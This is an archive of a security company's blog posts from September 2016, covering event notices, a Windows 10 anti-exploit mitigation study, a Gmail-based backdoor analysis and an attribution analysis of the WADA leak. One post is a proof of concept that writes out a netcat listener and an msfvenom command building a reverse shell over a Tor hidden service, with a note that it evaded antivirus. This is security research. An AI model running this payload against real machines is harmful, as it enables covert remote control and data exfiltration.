Participating in GSMA Mobile 360 LATIN AMERICA

viernes, 30 de septiembre de 2016

Mobile 360 - Latin America brings market leaders from Central and South America across the mobile telecom ecosystem for a two-day thought leadership conference together with operator-led Working Groups on day three. Attendees will learn and discuss key drivers in innovation in the region centered around IoT, Connected Car, Mobile Identity, Mobile Money, NFV, 5G, Media & Advertising, and more. In addition, an Innovation Showcase panel will allow start-ups to hear from venture capitalists, investors, and industry experts followed by a pitch session for the start-ups.

Session: Mobile Identity
There is no denying that mobile technology is deeply embedded into our lives. More and more industries are incorporating mobile into their business models and leveraging digital communications. While this improves efficiencies and can create competitive advantages, it also adds additional challenges to organisations to protect both themselves and their customers. If this aspect of the business is ignored or done poorly, the results can be catastrophic to the organisation.

Much focus has been placed on server integrity, internet security, cloud protection and safe data exchange in the traditional business models. What is new and must be explored is the data flow through the mobile ecosystem, specifically mobile security and data privacy. M2M and IoT will continue to grow and new security threats will emerge. How is this data being shared across the value chain? How can organisations ensure their data is safe as it travels through the network? How should companies respond to security breaches? What are the new rules with regard to privacy? How should enterprises be protected in this increasingly connected world?

Óscar Mancebo, Head of Mobile Connect at Telefónica

An increasing number of digital services, including financial and government services, are offering customers access using digital authentication and identity. Despite the complexity involved in deployment, digital authentication enables users to have a better quality of experience by giving them greater control over their own digital identities, and also enables more effective customer data management by service providers. A range of service providers are offering digital authentication and identity services today, from mobile operators to specialist companies, often utilising different technology approaches.

Telefónica has played a relevant role in this session, describing how Mobile Connect is well positioned as an alternative to the password based model and explaining how this product is fully aligned with the new strategic plan announced some weeks ago by the Company: We choose it all.


For more information on Mobile Connect and to see it in action go to:
www.elevenpaths.com

Mobile Connect website:
https://mobileconnect.io/

Quiero ir a Security Innovation Day 2016 de ElevenPaths y Telefónica

jueves, 29 de septiembre de 2016



SORTEAMOS 1 ENTRADA DOBLE
¡Sorteamos 1 entrada doble para Security Innovation Day 2016! Sí, has leído bien. Si quieres asistir al evento del año sobre innovación y seguridad, participa en nuestro concurso.

¿Qué hay que hacer para participar y ganar?
1. Sigue a ElevenPaths en Twitter
2. Comparte este tuit » Quiero ir a Security Innovation Day 2016 de @ElevenPaths y @Telefonica #SID2016


El ganador se elegirá el día 3 de octubre de 2016 de manera aleatoria.

¡Mucha suerte y nos vemos en Security Innovation Day!


Aplicación práctica sobre NetcaTor, una shell inversa a través de Tor

miércoles, 28 de septiembre de 2016

Uno de los puntos débiles de los atacantes a la hora de exfiltrar información comprometida es la exposición de parte de su infraestructura tecnológica durante el proceso. En este sentido, la red Tor ofrece la posibilidad de hacer accesibles servicios en una máquina como servicios ocultos o hidden services aprovechando la capa de anonimato que ofrece y así evitar que quede expuesta la localización real de la máquina.

Cómo configuramos un hidden service
La configuración de un hidden service es sencilla y además está bien documentada por parte de los desarrolladores del proyecto Tor dentro del propio código como en la propia web del proyecto. Virtualmente, cualquier servicio que utilice tráfico TCP puede ser creado a través de la red Tor modificando la configuración del archivo torrc.

La creación del hidden service con Tor instalado en una máquina requiere la edición del fichero de configuración de Tor torrc que se encuentra en la ruta /etc/tor/ en sistemas operativos Linux. En las líneas del fichero 63 y siguientes se detallan ejemplos de cómo configurar un hidden service. La primera de ellas establecerá la ruta en la que se almacenará la información relativa al hidden service y que será creada si no existe por el servicio que arranca Tor. En esa ruta se almacenan dos archivos importantes: hostname, que contiene el dominio que otros podrán utilizar para acceder al servicio y private_key, el fichero que almacena la clave privada del hidden service y cuya custodia queda a cargo del administrador del sitio siendo necesario que permanezca secreta.

############### This section is just for location-hidden services ###

## Once you have configured a hidden service, you can look at the
## contents of the file ".../hidden_service/hostname" for the address
## to tell people.
##
## HiddenServicePort x y:z says to redirect requests on port x to the
## address y:z.

#HiddenServiceDir /var/lib/tor/hidden_service/
#HiddenServicePort 80 127.0.0.1:80

Por ejemplo, en el caso de que hubiéramos desplegado un servidor Apache en el puerto 80, podríamos hacerlo accesible a través de un hidden service editando la configuración y descomentando la información de las líneas 72 y 73 de dicho fichero para crear los archivos hostname en la ruta /var/lib/tor/hidden_service/ y redirigir el tráfico que reciba Tor en el puerto 80 a ese hidden service al puerto 80 de la máquina local en donde está esperando el servidor Apache.

Esta aproximación podría llevarse a cabo también para exponer un servicio SSH accesible a través de Tor, modificando las líneas relativas al HiddenServicePort para que apunten al puerto 22. Para acceder a dicho servicio existen diferentes aproximaciones, pero la más sencilla es la de lanzar el comando de conexión precediéndolo del comando torify, que se encargará de redirigir el tráfico de red para enviarlo a través de la instancia de Tor que esté en ejecución en dicha máquina.

La prueba de concepto
Desde el punto de vista de la arquitectura necesaria para esta prueba de concepto se asumirá qué víctima y atacante están utilizando sistemas Linux y tienen Tor instalado y corriendo como servicio. El procedimiento seguido para llevar a cabo esta prueba de concepto es el siguiente:

   1. Despliegue del servicio malicioso a la escucha en la máquina atacante. En este caso se desplegará un netcat a la espera de conexiones en el puerto 1234 de la máquina local. No es necesario exponer públicamente el servicio ya que el tráfico en ese puerto será encaminado hacia y desde Tor.
Attacker > nc -v -l -p 1234 127.0.0.1

   2. Configuración de Tor en la máquina atacante para hacerlo accesible a través de un dominio .onion. Utilizando como plantilla el fichero torrc, se añaden dos líneas nuevas que especifican la ruta en la que se generarán los ficheros auxiliares del servicio y las reglas de direccionamiento.

HiddenServiceDir /var/lib/tor/nc_hidden_service/
HiddenServicePort 1234 127.0.0.1:1234

El dominio .onion definido en el archivo hostname estará disponible apenas unos segundos después de arrancarlo. En el caso de esta prueba de concepto el dominio generado es: vks3v4ilo4tgud7h.onion.

Attacker > service tor restart

Figura 1. Esquema del sistema malicioso que utiliza Tor para la exfiltración de información.

   3. Preparación del payload torificado por parte del atacante. El payload se generará con la utilidad msfvenom de Metasploit Framework utilizando el módulo linux/x86/exec que torificará la conexión de netcat hacia el dominio .onion del atacante y que permitirá al atacante la ejecución de comandos.

Attacker > msfvenom -p linux/x86/exec CMD="torify nc vks3v4ilo4tgud7h.onion 1234 -e /bin/bash" -f elf R > poc

   4. Ejecución del payload torificado en la máquina de la víctima. Aunque se podría realizar explotando algún tipo de vulnerabilidad, para simplificar el proceso en este caso se ha ejecutado directamente el payload generado.

Victim > chmod +x poc
Victim > ./poc

   5. Explotación por parte del atacante de la shell redirigida hacia netcat.

En este caso, se asume que la víctima cuenta con Tor instalado y la aplicación torify disponible. En el supuesto de no ser así, se podría instalar automáticamente desde los repositorios oficiales de la distribución si el usuario dispone de los permisos adecuados y así proceder a su instalación. En cualquier caso, si el usuario no tiene permisos de administración se podría incluir también el proceso de descarga de la última instancia de Tor y compilarla desde las fuentes satisfaciendo las dependencias o accediendo a versiones precompiladas de la aplicación. El primer análisis del payload generado en esta prueba de concepto en Virustotal no ha sido clasificado como malicioso por ninguna de las 53 soluciones de antivirus.

Figura 2. Ejemplo de la ejecución de la prueba de concepto en una máquina local.

Hemos creado entonces un payload utilizando el módulo exec con msfvenom. El inconveniente que tiene es que tenemos que recordar el comando completo que tenemos que ejecutar. Una aproximación más cómoda sería crear a partir de ese módulo uno nuevo que directamente nos solicitara el dominio .onion y el puerto al que nos vamos a conectar. En el siguiente repositorio de Github podréis acceder al nuevo módulo que hemos creado.

Esta prueba de concepto pone sobre la mesa la necesidad de monitorizar si máquinas consideradas como críticas están usando Tor para comunicarse con la red y determinar si este comportamiento es esperado o si podría ser consecuencia de un potencial encubrimiento de comunicaciones maliciosas.


ElevenPaths Talks: BioHacking

martes, 27 de septiembre de 2016




El próximo jueves 29 de septiembre nuestro compañero Gabriel Bergel impartirá una charla sobre BIO Hacking en la que se abordarán los conceptos y el lenguaje básico del BioHacking, tratando así de acercarte a este tema y sorprenderte con todo lo que se puede hacer. Gabriel te contará la historia de BioHacking, la ética y moral que rigen sus conceptos, sin dejar de lado las explicaciones de algunos experimentos básicos, etc.

La duración de la charla de Gabriel será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla serán las 15.30  (hora España). La charla estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangout. La sesión se impartirá en castellano.

Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Community, dónde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes mirar el calendario de talks para ver las que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 29 de septiembre en horario de 15.30 (hora España). Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

Más información en:
talks.elevenpaths.com

Una investigación de ElevenPaths en la RSA Conference de Abu Dhabi 2016

lunes, 26 de septiembre de 2016

Una investigación promovida desde el área de innovación y laboratorio de ElevenPaths, ha sido aceptada para participar en la RSA Conference de Abu Dhabi 2016 que tendrá lugar en noviembre y donde se presentarán los resultados.

Las conferencias RSA (cuyo mayor exponente se celebra en Estados Unidos) es reconocida mundialmente como el evento más importante para unir a investigadores de la industria de la seguridad a todos los niveles. Se ha convertido en el referente mundial para que se compartan ideas sobre seguridad, se desvelen los últimos productos de las compañías, y se impartan charlas, talleres, conferencias, etc. Tiene una afluencia de público cercana a los 50.000 visitantes al año.


La publicación "Android Malware Pattern Recognition for Fraud and Attribution" será presentada por Nikolaos Tsouroulas, ElevenPaths Head of Cybersecurity;  y Ahmed Alketbi, Senior Manager, Etisalat Security Solutions Marketing. Además, la investigación será publicada en "Encyclopedia on Social network analysis and mining (ESNAM)" editada por Springer.

La investigación habla de las técnicas de reconocimiento de patrones de malware y su problemática ante las nuevas amenazas. Aunque los métodos de Big Data y machine learning permiten aliviar el trabajo más duro para combatir el problema, los atacantes saben cómo eludir los controles de seguridad. Si se estrecha el alcance del Big Data hasta el punto en el que la HUMINT puede abordarlo, se estará aprovechando ambas técnicas y mejorándolas.

Fruto de esta investigación y difusión se espera no solo entender y mejorar la ciberseguridad en general sino integrar este conocimiento generado para potenciar e innovar en los productos y servicios más representativos desarrollados por ElevenPaths.

Gcat, un backdoor que utiliza Gmail como C&C

viernes, 23 de septiembre de 2016

Las muestras de malware, que utilizan servicios de correo electrónico como canales encubiertos para la exfiltración de información, están resultando eficaces en entornos corporativos con gran cantidad de información, principalmente por lo que implica limitar las comunicaciones hacia proveedores que también son usados legítimamente.

En un informe publicado por ElevenPaths el pasado mes de junio identificamos un incremento de hasta un centenar de muestras de malware entre junio de 2015 hasta julio de 2016, relacionadas con el uso de técnicas de covert channel que abusaban del correo de Gmail para exfiltrar información. Sin embargo, cuarenta de estas muestras estarían basadas en una herramienta denominadas Gcat.

Análisis de un binario basado en Gcat
La herramienta Gcat consta de dos ficheros: gcat.py e implant.py. El fichero gcat.py es el componente que ejecuta el atacante y que permitirá realizar acciones sobre el implant.py desplegado en las víctimas previa conversión a binario ejecutable.

La configuración que debe realizarse en Gcat implica la modificación de estos dos ficheros: gcat.py e implant.py. En este sentido, se debe añadir en ambos ficheros una cuenta de correo de Gmail y su contraseña. Por otro lado, es necesario activar la opción de permitir aplicaciones menos seguras en la parte de seguridad de la cuenta Gmail y habilitar IMAP en los ajustes de esta.

En los detalles de instalación y configuración de la herramienta se indica que es necesario realizar la compilación en 32 bits. Adicionalmente, durante el análisis de diferentes muestras, se han encontrado modificaciones tanto del archivo implant.py como del binario generado a partir de este. El objetivo de estas modificaciones es dificultar la detección y el análisis del fichero malicioso. Algunas de estas modificaciones incluyen técnicas para reubicar porciones de código y protegerlos con código antidesensamblado. También se han encontrado tareas de reenrutamiento de todas las llamadas a funciones a través de una función central para evadir el análisis estático de flujo de ejecución del programa.

Una vez desplegado el implant.py en la víctima, desde el controlador gcat.py, podremos listar los implantes desplegados en las víctimas con la opción -list. Por cada víctima se muestra una cadena que identifica de forma exclusiva el sistema infectado, además del sistema operativo en el que se está ejecutando como se muestra en la Figura 1.



En las siguientes figuras podemos observar los correos generados en la cuenta de Gmail además del contenido de cada uno de ellos con información sobre el contexto de ejecución en formato Json además de los procesos ejecutados y sistemas infectados:




En cuanto al implant.py, tras haber sido transformado a binario y obtener la ruta de la carpeta temporal del sistema, obtiene su propio ID de proceso para utilizar posteriormente en la creación de una carpeta temporal del sistema con el nombre _MEI seguido del ID del proceso obtenido.



El binario malicioso escribe 17 ficheros en la carpeta _MEI, necesarios para su funcionamiento en un entorno Windows como fichero binario PE, así como las diferentes librerías que utiliza (Figura 4). Seguidamente, se genera un nuevo proceso con la función CreateProcessW con el mismo nombre pero con un tamaño superior que sirve para establecer la comunicación con el servicio de Gmail. Al realizarse la comunicación mediante el protocolo HTTPS no es posible ver el contenido de la misma.


Al abrirse un nuevo proceso fuera del contexto del debugger, se ejecuta una nueva instancia del debugger para realizar el análisis del proceso denominado attach en la herramienta utilizada. En este momento, se realiza una conversión de hexadecimal a decimal del PID del nuevo proceso para saber cuál de los dos procesos con el mismo nombre se debe realizar el attach.


En este momento del análisis, se analiza el nuevo proceso en memoria con el objetivo de obtener el usuario de Gmail y la contraseña utilizada por el atacante. También es posible hacer un dump de la memoria del nuevo proceso generado para obtener los parámetros Gmail_user y Gmail_pwd.


Precaución a la hora de considerar los dominios de Gmail como confiables
Como ya hemos visto, los dominios de Gmail u otros proveedores de correo electrónico o incluso dominios relacionados con redes sociales podrían estar siendo utilizados para tomar el control de los sistemas de una organización. Es por ello que ElevenPaths recomienda realizar una monitorización en detalle de los mismos o incluso bloquearlos en el caso de sistemas que alberguen información sensible. Por otro lado, con las tecnologías de defensa contra malware avanzado se realiza una monitorización exhaustiva del comportamiento del endpoint, por lo que esta aproximación permitiría analizar el comportamiento del mismo si un dominio o servicio, a priori legítimo, podría estar siendo utilizado con fines maliciosos.

Connect via streaming Security Innovation Day, the event of the year in cybersecurity

jueves, 22 de septiembre de 2016




Welcome to the fourth edition of our Security Innovation Day which will be celebrated on October 6 at 3:00 pm (Madrid time) at the Telefónica Auditorium (Madrid), situated in the Central Building of the Distrito Telefónica, The international benchmark event in the cybersecurity sector, where we talk about innovation, alliances and main strategies of ElevenPaths and Telefónica. We count on reference speakers such as Chema Alonso, ElevenPaths Chairman and Telefónica CDO; and a guest star: Hugh Thompson, CTO Symantec + Blue Coat.

If you are in Madrid, be sure to put this appointment with cibersecurity in your diary! Sign up now.

Can't make it? Watch the event of the year on cybersecurity and innovation on live stream. Sign up here to access the live stream!

There will be live event coverage on ElevenPaths Twitter account using the hashtag #SID2016.

More information at:
securityinnovationday.elevenpaths.com


Sigue en streaming Security Innovation Day 2016, el evento de ciberseguridad del año

miércoles, 21 de septiembre de 2016




Como ya os adelantamos la semana pasada, el próximo jueves 6 de octubre a las 15.00 horas en el Auditorio Central de Telefónica, celebraremos la IV edición de Security Innovation Day. Un evento estrella en el sector de la ciberseguridad, en el que hablamos sobre innovación, alianzas y principales líneas estratégicas de ElevenPaths y Telefónica. Contaremos con ponentes de referencia, como Chema Alonso, Chairman de ElevenPaths y Jefe de Datos de Telefónica; y un invitado estrella, Hugh Thompson, CTO de Symantec, y referente en el mundo de la seguridad informática.

Para los que estéis en Madrid, os esperamos en el auditorio Central de Distrito Telefónica. ¡Regístrate aquí!

¿No puedes venir? Para los que estéis en otras localizaciones,  podéis seguir en vivo el evento en inglés y español. ¡Regístrate al streaming aquí!

También a través de la cuenta de Twitter de ElevenPaths se realizará una cobertura live del evento a través del hashtag #SID2016.


Más información en:
securityinnovationday.elevenpaths.com

*También te puede interesar:

[Nuevo informe] En un Windows 10 básico, el 22,2% de las librerías no aplica alguna medida de seguridad anti-exploit

A finales de 2013 se descubrió un 0day en Internet Explorer (CVE-2013-3893). Se trata de una vulnerabilidad encontrada mientras estaba siendo aprovechada por atacantes desde no se sabe cuándo.. Sin entrar en detalles, lo que más llamaba la atención es cómo habían conseguido crear el exploit. Dos de los enemigos de los creadores de exploits son habitualmente DEP en menor medida y ASLR en gran parte. ¿Cómo habían eludido este último sistema de seguridad? Simple: una DLL de sistema no tenía activado ASLR. No había razón alguna para que no lo hubiesen activado en esa en particular, quizás fue solo un despiste, pero que permitió a los atacantes aprovechar de forma sencilla una grave vulnerabilidad.

¿Qué otros binarios de sistema no han activado esta y otras protecciones en Windows 10? Este informe, elaborado por el área de innovación y laboratorio de ElevenPaths, desvela cuántos binarios no implementan las medidas básicas de seguridad en los ejecutables más comunes que cualquier usuario puede tener en Windows 10.

Cuatro medidas de seguridad

Cada nuevo sistema operativo que se lanza al mercado es más seguro que el anterior porque aplica más y mejores técnicas de mitigación o protección en seguridad. Al menos eso se dice en las campañas publicitarias y notas de prensa en las que los lanzan. Se incluyen métodos revolucionarios que prometen grandes mejoras y acabar con los problemas de seguridad existentes. Sin embargo, los problemas siguen ahí. Se transforman, se intercambian, se potencian unos y olvidan otros… pero nunca desaparecen. En este estudio hemos analizado las medidas de seguridad más recientes y clásicas, relativas a la compilación de binarios en Windows que implementa Windows 10. Pretendemos responder a algunas preguntas: ¿Utiliza sus propias fórmulas más modernas? ¿Aplica las medidas más clásicas a todos sus binarios? ¿En qué porcentaje? ¿Y otros fabricantes, aplican estas técnicas? Veremos en este informe estudiaremos qué medidas de seguridad pueden tener activadas los ejecutables en Windows 10, y cuáles tienen activadas en realidad.

En el informe se han comprobado cuatro medidas de seguridad básicas: DEP, ASLR, SEH y CFG. Son cuatro métodos anti-exploit que, de encontrarse activos en un fichero ejecutable (exe o dll) dificultan a un potencial atacante la capacidad de aprovechar vulnerabilidades de ejecución de código.

El experimento

Los ficheros objetivo del estudio han sido los ejecutables (EXE) y librerías (DLL). Se han analizado todos los ejecutables en tres perfiles de instalación (Windows 10, Windows 10 con paquete ofimático, y Windows 10 con paquete ofimático y navegadores y lectores PDF). Hemos almacenado sus características, o lo que es lo mismo qué flags de los mencionados más arriba se encuentran activos en los ejecutables y librerías. Hemos analizado el siguiente número de ficheros por cada perfil:
  • Base: 18489 archivos DLL y 2597 archivos EXE.
  • Ofimática: 20735 archivos DLL y 2716 archivos EXE.
  • Completa. 20856 archivos DLL y 2774 archivos EXE.
En general, en un Windows 10 básico con Office, navegadores y lectores PDF, un 22,20% de los ficheros binarios no activan alguna de las medidas de seguridad estudiadas.

El porcentaje de ficheros protegidos según cada perfil aumenta en tanto en cuanto la medida de seguridad se encuentra más asentada y arraigada, dejando a CFG (más reciente) en el último lugar con entre un 80 y un 90% de adopción en los diferentes perfiles. NO_SEH, aunque también antigua, no es tan adoptada. Es posible que se deba a la circunstancia de cada fichero, que daría cabida a otras medidas complementarias y que cubrieran con otras fórmulas la necesidad de protección que ofrece NO_SEH.


Con respecto a los navegadores (y programas de terceros en general) parece que Chrome ya ha adoptado en buena medida las nuevas mitigaciones anti-exploit como CFG y tiene al 100% asimiladas el resto. El único fichero de Chrome que no tiene activado ASLR es el propio instalador. Firefox, olvida CFG y NO_SEH.


Entre los lectores de PDF más populares, Adobe (históricamente un desastre en seguridad) funciona en este sentido mejor que Foxit. El 100% de sus binarios tiene activado DEP y ASLR, aunque ambos ignoran la nueva medida de seguridad CFG.


En general, la tecnología de mitigación más reciente, CFG, es la más olvidada tanto por la propia Microsoft (un 90% de sus ficheros en la instalación base no lo implementan) como por los programas más habituales (solo Chrome lo tiene en cuenta en un 81% de sus ficheros, el resto lo ignoran). Sin embargo, otras tecnologías de mitigación más antiguas son mucho más populares, como ASLR y DEP se encuentra casi universalmente adoptada tanto por programas como por sistema operativo.

A medida que se introducen programas fuera de la instalación base, (ofimáticos, navegación o lectores PDF) el porcentaje de ficheros desprotegidos crece, sobre todo en CFG.

Cabe recordar, como siempre, que la presencia o no de algunas de estos sistemas de mitigación (especialmente SEH) no merma necesariamente la seguridad del sistema operativo o los programas. Se pretende hacer énfasis con esto en que estas fórmulas son muy recomendadas, pero pueden encontrarse casos en los que otras mitigaciones adicionales o las circunstancias del binario (por ejemplo que no suela encontrarse en memoria, como el instalador) no las hagan necesarias… aunque por el contrario es altamente improbable que activarlas suponga un riesgo.

En este sentido, el programa para mitigar la explotación (entre otras funciones) como EMET, de la propia Microsoft, ayuda a implementar de forma obligatoria e incluso reforzar muchas de las técnicas descritas junto con otras.

Todos los detalles del informe, en los que se explican las tecnologías en detalle y se aportan más gráficas y comparativas, están disponibles en SlideShare.



ElevenPaths Talks: Estructura interna de un CSIRT (Parte 2)

martes, 20 de septiembre de 2016




El próximo jueves 22 de septiembre nuestro compañero Leonardo Huertas impartirá una charla sobre Estructura interna de un CSIRT (Parte 2) tratará los problemas y desafíos a los que se enfrentan los equipos CSIRT, los beneficios de desarrollar un equipo de este tipo, y otros aspectos importantes.

La duración de la charla de Leonardo será de unos 30 minutos, divididos entre 20 y 25 minutos de exposición y de 5 a 10 minutos de preguntas y respuestas. El horario de la charla serán las 15.30  (hora España). La charla estará disponible al termina ésta en nuestro canal de YouTube. La ponencia se llevará a cabo por Hangout. La sesión se impartirá en castellano.

Si quieres saber más acerca del tema, no dudes en pasarte por nuestra Community, dónde nuestros compañeros hablan sobre éste y otros temas de interés en el mundo de la Seguridad. Puedes mirar el calendario de talks para ver las que aún quedan por celebrarse. Recuerda, tienes una cita el próximo 22 de septiembre en horario de 15.30 (hora España). Para registrarte debes usar el siguiente formulario de ElevenPaths Talks.

Más información en:
talks.elevenpaths.com

Cybersecurity Shot_Fuga de información de Dropbox

lunes, 19 de septiembre de 2016




¡Esta semana os traemos un nuevo caso real sobre fuga de información! Cybersecurity Shotes un tipo de informe de investigación elaborado por nuestro equipo de expertos analistas, sobre casos de actualidad relacionados con bases de datos filtradas en la red, así como algunas recomendaciones que podrían haberlo evitado.

Aquí os dejamos un breve resumen del último caso analizado:

Caso Dropbox
Investigación "Fuga de información de Dropbox"
La ciberidentidad Peace_of_Mind no se ha conformado con filtrar las bases de datos de LinkedIn y MySpace. Su último blanco ha sido Dropbox con más de 68MM de credenciales comprometidas. El 25 de agosto Dropbox anunciaba a través de su blog que, como medida de precaución, iban a ser restablecidas las contraseñas de la totalidad de las cuentas creadas con anterioridad al año 2012. Esta fuga se confirmaba tras el análisis independiente realizado por diferentes expertos en seguridad, que analizaban la presunta fuga de datos.

La fuga de información está siendo ofertada en TheRealDeal, un conocido mercado de compraventa en la deep web, por la ciberidentidad peace_of_mind ya asociada a otras grandes filtraciones en 2016.

Nuestros analistas recomiendan la implantación de herramientas para la autenticación en dos pasos, para evitar accesos no autorizados, así como la sustitución de las credenciales que estuvieran siendo reutilizadas en servicios de terceros.

Descubre más detalles de este fuga de datos en el Informe elaborado por nuestros analistas de inteligencia.

» Descárgate el informe de investigación completo “Fuga de información de Dropbox“

No te puedes perder el próximo:
» Caso World Anti Doping Agency

¿Quieres saber más sobre Ciberseguridad? Sé el primero en enterarte de todo lo que está pasando en la industria. ¡Suscríbete a nuestra Newsletter CyberSecurity Pulse!

Además, nuestro equipo de analistas te esperan en la Comunidad Técnica de ElevenPaths para resolver dudas, comentar la actualidad y compartir experiencia y curiosidades.

Más información en
Elevenpaths.com

ElevenPaths y Gradiant juntos para innovar en seguridad

viernes, 16 de septiembre de 2016


Vigo, 16 de septiembre de 2016. – Gradiant, el Centro Tecnolóxico TIC de Galicia, y ElevenPaths, la unidad de Ciberseguridad de Telefónica centrada en la innovación en productos de seguridad, hemos firmado esta mañana un acuerdo marco (MOU, Memorandum of Agreement), en virtud del cual nos comprometemos a trabajar juntas por la innovación en seguridad y privacidad.

El acto de firma del documento ha tenido lugar en la sede de Gradiant en Vigo, y es fruto de un trabajo conjunto de varios meses. Han asistido el Director General de Gradiant, Luis Pérez Freire, y Chema Alonso, Chairman de ElevenPaths y CDO (Chief Data Officer) de Telefónica.

En palabras de Chema Alonso, “Gradiant es un centro de investigación que, al igual que ElevenPaths; apuesta por la innovación apoyándose en talento joven y local. Este acuerdo de colaboración nos permitirá trabajar conjuntamente para innovar en tecnologías que mejoren la seguridad y privacidad, que son un objetivo prioritario para ambos".

Para Gradiant, el acuerdo con la filial de Telefónica es una muestra de que el trabajo desarrollado por el Centro Tecnológico en definir y concretar su apuesta estratégica por las tecnologías de seguridad, inteligencia y conectividad.

El documento rubricado hoy deja clara la voluntad de ambas partes de seguir explorando más formas de colaboración mutua en favor de la innovación en seguridad, tanto en desarrollos del portfolio tecnológico de Gradiant que actualmente ya están presentes en mercados internacionales, como en potenciales nuevas propuestas de I+D; incluso en colaboración con terceras partes si fuese conveniente.

Este acuerdo y su posterior desarrollo acompañan también a la estrategia de internacionalización de ElevenPaths y de Gradiant, que por su parte ya está presente en foros y organismos de influencia en el ámbito de la seguridad y la ciberseguridad a nivel internacional, como ECSO (European Cyber Security Organisation) en calidad de miembro fundador; o RENIC (Red de Excelencia Nacional de Innovación en Ciber Seguridad).

El recorrido de Gradiant en seguridad está avalado por el desarrollo de un gran número de soluciones tecnológicas seguras, aplicando los principios de security & privacy by design. Soluciones como las basadas en el procesado de datos en dominio cifrado (que permiten realizar análisis mientras preservan la privacidad e identidad de los usuarios) que garantizan el procesado de datos confidenciales de forma segura. O soluciones basadas en cifrado homomórfico y módulos de seguridad hardware (HSMs), que permiten realizar operaciones en la nube con datos cifrados. Gradiant también ha aplicado el paradigma del IoT (Internet de las Cosas) seguro en escenarios reales, en los que la seguridad juega un papel decisivo. Gradiant desarrolla tecnologías biométricas basadas en reconocimiento facial, de firma o de voz. Además, el procesado y el análisis inteligente de vídeo que desarrolla Gradiant permite automatizar y simplificar la monitorización y vigilancia en entornos complejos (por ejemplo, videovigilancia o vídeo capturado en tiempo real por drones o UAVs).


*También te puede interesar:
Nuestro CEO, Pedro Pablo Pérez, representará a Telefónica en la Organización Europea de Ciberseguridad

Más información:
www.elevenpaths.com

Contradicciones en los ataques a la Agencia Mundial Antidopaje

jueves, 15 de septiembre de 2016

El 13 de septiembre el grupo identificado como @FancyBears en Twitter publicaba, en una web de reciente creación, información sobre cuatro conocidas deportistas de élite que, presuntamente, habría sido sustraída en una acción perpetrada contra la WADA (World Anti Doping Agency). En un comunicado oficial la propia organización ha confirmado el ataque y la exposición de información de hasta 29 atletas, atribuyendo el ataque a orígenes rusos. Este incidente se produce apenas unas semanas después del envío de una serie de correos electrónicos de spear phishing para la recolección de credenciales de usuarios de WADA.

Qué se sabe de la información expuesta
La información publicada en las webs pertenecientes al colectivo incluía diversos ficheros PDF y capturas de pantalla de lo que parecían ser informes oficiales de WADA. En ellos se recoge información personal de los deportistas vinculada a los certificados de aprobación para uso terapéutico de determinados medicamentos. Los metadatos de los documentos extraídos exponen el nombre usuario chnd, el software OpenOffice 2.1 y la fecha del 31 de agosto de 2016 en una zona horaria UTC-4 salvo un fichero fechado el 8 de septiembre.


Se ha podido identificar que este usuario chnd es el creador de otro documento disponible públicamente a través de un subdominio de WADA en el que se aloja el gestor documental ADAMS. Dicho documento publicado en noviembre de 2008 recoge los cambios que han tenido lugar en la versión 2.0 de la plataforma lo que apunta a que este usuario podría ser un usuario de administración dentro de la organización.

En los metadatos, también se ha identificado la versión de OpenOffice 2.1, que se liberó en diciembre de 2006 y fue la versión más reciente utilizada hasta marzo de 2007. Actualmente se trata de una versión obsoleta de la suite de ofimática y se tiene constancia de la existencia de vulnerabilidades como CVE-2008-2152 que permiten la ejecución remota de código malicioso a partir de documentos ofimáticos especialmente diseñados.

Con respecto a la web de difusión
Las ciberidentidades implicadas utilizan una narrativa característica asociada tradicionalmente al colectivo hacktivista Anonymous que los propios autores enmarcan en el contexto de una operación a mayor escala bautizada como #OpOlympics. Tanto su iconografía como los mensajes publicados sitúan las acciones en la órbita de este colectivo. Por otro lado, se tiene constancia de que la marca Fancy Bear Hack Team ya ha sido asociada en febrero de 2016 a otros grupos hacktivistas vinculados a Rusia como APT28.

En este sentido, la creación de la cuenta de Twitter @FancyBears data del 6 de septiembre de 2016 aunque su primer tweet no se publicó hasta las 23:08 del 12 de septiembre (UTC+2). En las páginas web se utiliza como fecha de la filtración el 13 de septiembre lo que podría indicar un desfase horario que situara al filtrador en la franja horaria de, al menos, UTC+3 (hora de Moscú). La segunda parte de la filtración tiene fecha de publicación en  la web del 15 de septiembre. Sin embargo, las cabeceras consultadas hoy mismo sirven como fecha de última modificación el 14 de septiembre de 2016 a las 21:30 GMT. Es decir, el miércoles 14 de septiembre 23:30 de UTC+2 y ya 15 de septiembre para la zona horaria de UTC+3 y anteriores. Esta circunstancia es coherente con la hipótesis barajada por la WADA acerca de los orígenes del ataque.

En la cuenta de Facebook facilitada por el colectivo también se publicita la información filtrada. Aunque el primer comentario está en griego, 6 de los 10 siguientes se encuentran en ruso, lo que también sugiere una primera divulgación de la página de Facebook en plataformas de habla rusa.

La cuenta de correo facilitada como contacto es un correo electrónico de Yahoo que estaría vinculado a otro que utiliza el mismo alias en mail.ws. Por su parte la dirección de Bitcoin 1CPYPJkUwqCAdq5WhJKz765aa44JpQGxXN publicada en la página del grupo ha recibido al menos seis transacciones por valor de 0,04752135 bitcoins (25,71 euros al cambio).



El dominio fancybear.org está registrado con un proveedor de registro anónimo mientras que en fancybear.net sí que se ha identificado información adicional que apuntaría a un usuario situado en Francia con una cuenta gmx.com. Ambos dominios fueron registrados recientemente: el 1 de septiembre de 2016.

No se ha podido establecer la localización de los servidores porque la web utiliza la plataforma Cloudflare.com que ofrece un servicio de protección frente a ataques de denegación de servicio. Ninguno de los correos electrónicos identificados en la investigación ha sido utilizado para la contratación de este servicio lo que hace pensar en el uso de al menos otra cuenta de correo electrónico adicional por parte de los autores.

Los comentarios del código HTML de la página en la que se expuso la primera parte de la fuga estaban en coreano, aunque se correspondían con palabras sencillas como: contenido (함유량), redes sociales (소셜) 네트워킹) o final (끝). Curiosamente, tras la divulgación de la segunda parte de la fuga, no se ha podido encontrar estos comentarios ni en el código de la página principal ni en las páginas page-1.html y page-2.html que se han creado tras esta segunda actualización. La estructura del nombre de estos archivos sugiere que en el futuro se vayan a producir más filtraciones.



